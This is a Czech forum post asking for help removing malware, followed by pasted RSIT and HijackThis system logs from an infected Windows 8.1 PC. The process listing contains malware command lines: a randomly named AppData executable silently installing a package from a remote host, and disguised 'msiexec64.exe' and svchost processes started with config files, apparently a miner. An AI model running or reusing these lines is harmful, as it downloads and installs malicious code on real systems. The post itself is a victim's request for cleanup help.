Prosím o pomoc s odstraněním viru

[Kate34]

Avast hlásí několikrát během dne zachycení hrozby a přesunutí do truhly.

Avast Printscrenn.jpg (94.98 KiB) Zobrazeno 1246 x

Logfile of random's system information tool 1.10 (written by random/random)
Run by eciO at 2018-08-25 18:56:57
Microsoft Windows 8.1
System drive C: has 19 GB (17%) free of 114 GB
Total RAM: 8135 MB (64% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 18:57:09, on 25. 8. 2018
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.19036)
Boot mode: Normal

Running processes:
C:\Program Files\AVAST Software\Avast\AvastUI.exe
D:\Hry\Steam\Steam.exe
C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe
C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe
C:\Users\eciO\AppData\Local\uNUorUVyYOqO.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\eciO.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/?clid=29530
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Lync Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [Dare-U mouse] "C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [Overwolf] C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent
O4 - HKCU\..\Run: [Skype for Desktop] C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
O4 - HKCU\..\Run: [Steam] "D:\Hry\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [EpicGamesLauncher] "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll
O9 - Extra button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra 'Tools' menuitem: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Protocol: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL
O23 - Service: ArcSoft Connect Daemon (ACDaemon) - ArcSoft Inc. - C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: EasyAntiCheat - EasyAntiCheat Ltd - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: MSI_Trigger_Service - MICRO-STAR INTERNATIONAL CO., LTD. - C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Overwolf LTD - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: CamMonitor (uCamMonitor) - ArcSoft, Inc. - C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: SHAREit Hotspot Service (uSHAREitSvc) - SHAREit Technologies Co.Ltd - C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.Service.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9860 bytes

======Listing Processes======





wininit.exe

winlogon.exe


C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
"dwm.exe"
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
"C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -f "C:\ProgramData\NVIDIA\DisplaySessionContainer%d.log" -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\Session" -r -l 3 -p 30000 -c
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe -k utcsvc
dashost.exe {264590bd-b37e-4380-87e0180d92fe2c5a}
"C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe"
"C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
C:\Windows\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe"
C:\Windows\system32\wbem\wmiprvse.exe
taskhostex.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\skydrive.exe -Embedding
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

"C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
AvastUI.exe /nogui
"C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe" -overwolfsilent -silent
C:\Windows\system32\SearchIndexer.exe /Embedding
"D:\Hry\Steam\Steam.exe" -silent
"C:\Program Files (x86)\Overwolf\0.118.1.8\OverwolfBrowser.exe" --type=crashpad-handler --no-rate-limit --max-db-size=10 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\Overwolf\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\Overwolf\User Data" --url=http://localhost:54286 --annotation=platform=win64 --annotation=product=Overwolf --annotation=version=0.118.1.8 --initial-client-data=0xb84,0xb8c,0xb90,0xb88,0xb94,0x7ffd1544bc48,0x7ffd1544bc58,0x7ffd1544bc68
"C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe"
"C:\Program Files (x86)\Overwolf\0.118.1.8\OverwolfBrowser.exe" --type=gpu-process --disable-features=TouchpadAndWheelScrollLatching --no-sandbox --locales-dir-path="C:\Program Files (x86)\Overwolf\0.118.1.8\Locales" --log-file="C:\Users\eciO\AppData\Local\Overwolf\Log\OverwolfCEF_4876.log" --log-severity=error --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OverwolfClient/0.118.1.8" --lang=cs-CZ --ignore-certificate-errors --ow-process-id=4876 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --gpu-vendor-id=0x10de --gpu-device-id=0x1401 --gpu-driver-vendor=NVIDIA --gpu-driver-version=23.21.13.8813 --gpu-driver-date=10-27-2017 --locales-dir-path="C:\Program Files (x86)\Overwolf\0.118.1.8\Locales" --log-file="C:\Users\eciO\AppData\Local\Overwolf\Log\OverwolfCEF_4876.log" --log-severity=error --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OverwolfClient/0.118.1.8" --lang=cs-CZ --ignore-certificate-errors --ow-process-id=4876 --service-request-channel-token=62AA04EAA2D2486CF9E9C8634AC8D56D --mojo-platform-channel-handle=3580 /prefetch:2
"C:\Windows\System32\SettingSyncHost.exe" -Embedding
"C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper.exe" "path=C:\Program Files (x86)\Overwolf\0.118.1.8\win32\OWExplorerLauncher.dll
"C:\Program Files (x86)\Common Files\Overwolf\0.118.1.8\OverwolfHelper64.exe" "path=C:\Program Files (x86)\Overwolf\0.118.1.8\OWExplorerLauncher.dll
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe "-lang=cs_CZ" "-cachedir=C:\Users\eciO\AppData\Local\Steam\htmlcache" "-steampid=5468" "-buildid=1533766730" "-steamid=0" "-clientui=D:\Hry\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --disable-gpu-compositing --disable-gpu --enable-direct-write "--log-file=D:\Hry\Steam\logs\cef_log.txt"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe --type=crashpad-handler /prefetch:7 --max-uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\CEF\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\CEF\User Data" --url=http://crash.steampowered.com/submit --annotation=platform=win32 --annotation=product=cefwebhelper --annotation=version=1.0 --initial-client-data=0x25c,0x260,0x264,0x258,0x268,0x6c4f86f0,0x6c4f8700,0x6c4f870c
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=renderer --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --disable-gpu-compositing --service-pipe-token=D45380E43B52C3E18578E7675120A4BD --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=en-US --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --disable-spell-checking --buildid=1533766730 --steamid=0 --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=D45380E43B52C3E18578E7675120A4BD --renderer-client-id=2 --mojo-platform-channel-handle=1612 /prefetch:1
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=gpu-process --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --lang=cs-CZ --buildid=1533766730 --steamid=0 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x10de --gpu-device-id=0x1401 --gpu-driver-vendor=NVIDIA --gpu-driver-version=23.21.13.8813 --gpu-driver-date=10-27-2017 --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --lang=cs-CZ --buildid=1533766730 --steamid=0 --service-request-channel-token=C501D5581A458DD32E87FDD1F53E07E6 --mojo-platform-channel-handle=1628 --ignored=" --type=renderer " /prefetch:2
"D:\Hry\Steam\bin\cef\cef.win7\steamwebhelper.exe" --type=renderer --disable-features=AsyncWheelEvents,TouchpadAndWheelScrollLatching --disable-gpu-compositing --service-pipe-token=87E2EBE397EB58C25171B757BF5D880D --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --lang=en-US --log-file="D:\Hry\Steam\logs\cef_log.txt" --product-version="Valve Steam Client" --webview-urls=http://localhost/*,http://steamloopback ... localhost/* --disable-spell-checking --buildid=1533766730 --steamid=0 --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=87E2EBE397EB58C25171B757BF5D880D --renderer-client-id=4 --mojo-platform-channel-handle=2124 /prefetch:1
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
taskhost.exe $(Arg0)
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\eciO\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\eciO\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\eciO\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x11c,0x120,0x124,0x118,0x128,0x7ffd40f024d0,0x7ffd40f024e0,0x7ffd40f024f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1500 --on-initialized-event-handle=484 --parent-handle=492 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=57EEF75CAD87D16A240C0C26F984ABC4 --mojo-platform-channel-handle=1256 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=5B86496AED7B87D82F1052AEBC2F8670 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=5B86496AED7B87D82F1052AEBC2F8670 --renderer-client-id=3 --mojo-platform-channel-handle=2508 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=FCD14350A427810DE7690CB6B0289B84 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=FCD14350A427810DE7690CB6B0289B84 --renderer-client-id=4 --mojo-platform-channel-handle=2828 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=C2C0FE471223E7C5C11DE2AE64350B46 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=C2C0FE471223E7C5C11DE2AE64350B46 --renderer-client-id=5 --mojo-platform-channel-handle=2984 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=EA1BB1E83EBFCBC496F0C530FA4A28CC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=EA1BB1E83EBFCBC496F0C530FA4A28CC --renderer-client-id=27 --mojo-platform-channel-handle=4828 /prefetch:1
C:\Users\eciO\AppData\Local\uNUorUVyYOqO.exe /q /i http://lg-static.com/ovuziuzckaqp.okk
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe -Embedding 05037434C2F4296EA4D06959CEC909DC
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
"C:\Users\eciO\AppData\Local\UserData.db\msiexec64.exe" --config "C:\Users\eciO\AppData\Local\UserData.db\cuda.cfg"
\??\C:\Windows\system32\conhost.exe 0x4
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\eciO\AppData\Local\Temp\[3C2253]"
\??\C:\Windows\system32\conhost.exe 0x4

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=421BC6D01111BDDE21F46F2FB4F38AB3 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=421BC6D01111BDDE21F46F2FB4F38AB3 --renderer-client-id=47 --mojo-platform-channel-handle=6044 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1248,16953087833198166629,17646245723153791375,131072 --service-pipe-token=EB2A7DA0173E91711DC680C282E67084 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=EB2A7DA0173E91711DC680C282E67084 --renderer-client-id=49 --mojo-platform-channel-handle=7136 /prefetch:1
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 572 576 584 65536 580
"D:\Users\eciO\Downloads\RSITx64.exe"

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-08-05 938712]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}]
Skype for Business Browser Helper - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2018-08-17 152104]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-08-05 812248]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2014-11-26 7659736]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-07-19 242904]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Overwolf"=C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [2018-08-15 1501000]
"Skype for Desktop"=C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [2018-08-01 49703256]
"Steam"=D:\Hry\Steam\steam.exe [2018-08-09 3206432]
"EpicGamesLauncher"=C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [2018-07-27 32973712]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"Dare-U mouse"=C:\Program Files (x86)\uRage Illuminated Driver\Monitor.exe [2013-01-17 491520]
"Adobe ARM"=C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-03-28 1160408]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.YUY2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"VIDC.YVYU"=msyuv.dll
"VIDC.YVU9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"VIDC.UYVY"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux1"=wdmaud.drv

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
